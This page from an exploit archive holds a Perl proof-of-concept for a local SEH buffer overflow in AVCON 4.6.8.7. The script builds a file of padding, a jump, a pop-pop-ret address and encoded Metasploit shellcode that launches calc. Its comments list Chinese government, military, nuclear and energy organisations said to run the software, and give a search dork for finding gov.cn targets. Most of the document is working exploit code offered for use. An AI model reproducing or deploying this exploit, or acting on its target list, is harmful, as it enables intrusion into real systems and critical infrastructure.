what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

AVCON 4.6.8.7 Buffer Overflow

AVCON 4.6.8.7 Buffer Overflow
Posted May 7, 2010
Authored by Dillon Beresford

AVCON version 4.6.8.7 local buffer overflow exploit.

tags | exploit, overflow, local
SHA-256 | 1a8a480461d0d3c2498b083537be67c68a7297cd1eb60d87123ba8dc696ca7e6

AVCON 4.6.8.7 Buffer Overflow

Change Mirror Download
#!/usr/bin/perl

# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"

# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)

# 2 products from China and 2 0days in one month dizam!

# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration

my $exploit = "poc.txt";
my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x06\x90\x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret

# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";

my $padding = "\x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;
open (myfile,">$exploit");
print myfile $payload;
close (myfile);
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close